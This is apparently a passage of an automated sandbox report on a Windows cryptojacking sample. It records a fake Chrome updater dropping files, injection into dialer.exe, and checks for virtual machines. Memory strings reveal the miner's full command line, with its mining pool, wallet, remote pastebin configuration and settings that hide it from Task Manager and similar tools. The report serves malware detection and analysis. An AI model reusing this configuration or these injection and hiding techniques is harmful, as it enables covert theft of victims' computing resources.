                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\dialer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,14_2_00007FF68D3D10C0
                    Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,42_2_00007FF6429510C0
                    Source: C:\Windows\System32\dialer.exeSystem information queried: FirmwareTableInformation
                    Source: dialer.exe, 00000034.00000003.2193166407.000001888CD4B000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000034.00000002.3320602236.000001888CD3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                    Source: dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEXEXE
                    Source: dialer.exe, 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\SYSTEM32\DIALER.EXE--ALGO=RX/0--URL=XMR-EU1.NANOPOOL.ORG:10343--USER=42W7YGWWRGZPFZQCD5CDZUFLYRRXLKFURCSEPKBE7W8Z1A8KJXJR4B1YC5CHI7OQBFICW1KZSPEHQQQEO2I4NPRFCVXRUKS--PASS=--CPU-MAX-THREADS-HINT=20--CINIT-WINRING=LIBTQLIBDOYD.SYS--CINIT-REMOTE-CONFIG=HTTPS://PASTEBIN.COM/RAW/MJDPKDHR--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-VERSION=3.3.0--TLS--CINIT-IDLE-WAIT=5--CINIT-IDLE-CPU=80--CINIT-ID=QQGNFENFEMXXTPHAJ
                    Source: dialer.exe, 00000034.00000003.2171682791.000001888CCB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HTTPS://PASTEBIN.COM/RAW/MJDPKDHRTASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEQQGNFENFEMXXTPHA
                    Source: dialer.exe, 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                    Source: dialer.exe, 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE%
                    Source: dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000034.00000003.2193071885.000001888D285000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "STEALTH-TARGETS": "TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE",
                    Source: dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEDLLLRSHELL\M:MV
                    Source: dialer.exe, 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE<
                    Source: dialer.exe, 00000034.00000003.2193071885.000001888D28F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: XMR-EU1.NANOPOOL.ORG4BBOENU9KW6ZOTG5ESVMXP238BVUTGISGCAQ7VSKCKVSN9OVZKRJDSH6J1B2UVJ7DQJ4QFMEZDIXRG6SSP8PR2Y87CUKQ9DSTEALTH-TARGETSTASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXESTEALTH-FULLSCREENALGO
                    Source: dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000034.00000003.2193071885.000001888D28F000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000034.00000003.2171682791.000001888CCB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5273Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4584Jump to behavior
                    Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 9999Jump to behavior
                    Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 9932Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7659Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2012Jump to behavior
                    Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9872Jump to behavior
                    Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 1804
                    Source: C:\Program Files\Google\Chrome\updater.exeDropped PE file which has not been started: C:\Windows\Temp\bzqlyietdwsj.tmpJump to dropped file
                    Source: C:\Users\user\Desktop\hiwA7Blv7C.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bzqlyietdwsj.tmpJump to dropped file
                    Source: C:\Program Files\Google\Chrome\updater.exeDropped PE file which has not been started: C:\Windows\Temp\libtqlibdoyd.sysJump to dropped file
                    Source: C:\Windows\System32\lsass.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_27-22930
                    Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_30-15146
                    Source: C:\Windows\System32\dialer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_14-425
                    Source: C:\Windows\System32\lsass.exeAPI coverage: 3.3 %
                    Source: C:\Windows\System32\svchost.exeAPI coverage: 4.9 %
                    Source: C:\Windows\System32\svchost.exeAPI coverage: 4.7 %
                    Source: C:\Windows\System32\svchost.exeAPI coverage: 5.2 %
                    Source: C:\Windows\System32\svchost.exeAPI coverage: 6.1 %
                    Source: C:\Windows\System32\svchost.exeAPI coverage: 6.1 %
                    Source: C:\Windows\System32\svchost.exeAPI coverage: 6.0 %
                    Source: C:\Windows\System32\svchost.exeAPI coverage: 4.6 %
                    Source: C:\Users\user\Desktop\hiwA7Blv7C.exe TID: 2936Thread sleep time: -70000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6480Thread sleep count: 5273 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6480Thread sleep count: 4584 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4000Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                    Source: C:\Windows\System32\winlogon.exe TID: 5664Thread sleep count: 9999 > 30Jump to behavior
                    Source: C:\Windows\System32\winlogon.exe TID: 5664Thread sleep time: -9999000s >= -30000sJump to behavior
                    Source: C:\Program Files\Google\Chrome\updater.exe TID: 5292Thread sleep time: -70000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\lsass.exe TID: 1208Thread sleep count: 9932 > 30Jump to behavior
                    Source: C:\Windows\System32\lsass.exe TID: 1208Thread sleep time: -9932000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5780Thread sleep count: 7659 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5164Thread sleep count: 2012 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6636Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 5872Thread sleep count: 241 > 30Jump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 5872Thread sleep time: -241000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\dwm.exe TID: 3532Thread sleep count: 9872 > 30Jump to behavior
                    Source: C:\Windows\System32\dwm.exe TID: 3532Thread sleep time: -9872000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\dialer.exe TID: 5348Thread sleep count: 1804 > 30
                    Source: C:\Windows\System32\dialer.exe TID: 5348Thread sleep time: -180400s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 4932Thread sleep count: 253 > 30
                    Source: C:\Windows\System32\svchost.exe TID: 4932Thread sleep time: -253000s >= -30000s
                    Source: C:\Windows\System32\dialer.exe TID: 3960Thread sleep time: -95000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 3164Thread sleep count: 254 > 30
                    Source: C:\Windows\System32\svchost.exe TID: 3164Thread sleep time: -254000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 5368Thread sleep count: 252 > 30
                    Source: C:\Windows\System32\svchost.exe TID: 5368Thread sleep time: -252000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 5396Thread sleep count: 250 > 30
                    Source: C:\Windows\System32\svchost.exe TID: 5396Thread sleep time: -250000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 4372Thread sleep count: 200 > 30
                    Source: C:\Windows\System32\svchost.exe TID: 4372Thread sleep time: -200000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 6964Thread sleep count: 252 > 30
                    Source: C:\Windows\System32\svchost.exe TID: 6964Thread sleep time: -252000s >= -30000s
                    Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                    Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
                    Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
                    Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
                    Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
                    Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
                    Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\winlogon.exeCode function: 23_2_000002D0165EDCE0 FindFirstFileExW,23_2_000002D0165EDCE0
                    Source: C:\Windows\System32\lsass.exeCode function: 27_2_000002D6F151DCE0 FindFirstFileExW,27_2_000002D6F151DCE0
                    Source: C:\Windows\System32\lsass.exeCode function: 27_2_000002D6F157DCE0 FindFirstFileExW,27_2_000002D6F157DCE0
                    Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000014E41FDDCE0 FindFirstFileExW,30_2_0000014E41FDDCE0
                    Source: C:\Windows\System32\dwm.exeCode function: 31_2_000001D15B08DCE0 FindFirstFileExW,31_2_000001D15B08DCE0
                    Source: C:\Windows\System32\svchost.exeCode function: 46_2_0000023AF32EDCE0 FindFirstFileExW,46_2_0000023AF32EDCE0
                    Source: C:\Windows\System32\svchost.exeCode function: 50_2_0000023C9FD9DCE0 FindFirstFileExW,50_2_0000023C9FD9DCE0
                    Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001A1CA71DCE0 FindFirstFileExW,51_2_000001A1CA71DCE0
                    Source: C:\Windows\System32\svchost.exeCode function: 53_2_00000246EDE6DCE0 FindFirstFileExW,53_2_00000246EDE6DCE0
                    Source: C:\Windows\System32\svchost.exeCode function: 54_2_00000200A19BDCE0 FindFirstFileExW,54_2_00000200A19BDCE0
                    Source: C:\Windows\System32\svchost.exeCode function: 55_2_000002259668DCE0 FindFirstFileExW,55_2_000002259668DCE0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: lsass.exe, 0000001B.00000000.2135862561.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
                    Source: dialer.exe, 00000034.00000002.3320602236.000001888CCB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWv
                    Source: dwm.exe, 0000001F.00000000.2144668597.000001D156AA0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000gB
                    Source: lsass.exe, 0000001B.00000000.2135862561.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
                    Source: svchost.exe, 00000036.00000002.3332840295.00000200A2218000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
                    Source: dialer.exe, 00000034.00000002.3320602236.000001888CCB1000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000034.00000002.3320602236.000001888CC58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: svchost.exe, 00000033.00000002.3320150147.000001A1CA000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                    Source: lsass.exe, 0000001B.00000000.2135862561.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
                    Source: dwm.exe, 0000001F.00000000.2144668597.000001D156B0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                    Source: lsass.exe, 0000001B.00000002.3324532176.000002D6F0613000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135732569.000002D6F0613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001E.00000000.2139714419.0000014E41C13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3321323009.0000014E41C13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3321630822.0000023C9FE2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2169595526.0000023C9FE2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2171295021.000001A1CA034000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3320596627.000001A1CA034000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3323235611.00000200A1241000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000000.2184612889.00000200A1241000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: lsass.exe, 0000001B.00000000.2136214678.000002D6F0CC0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Administrators
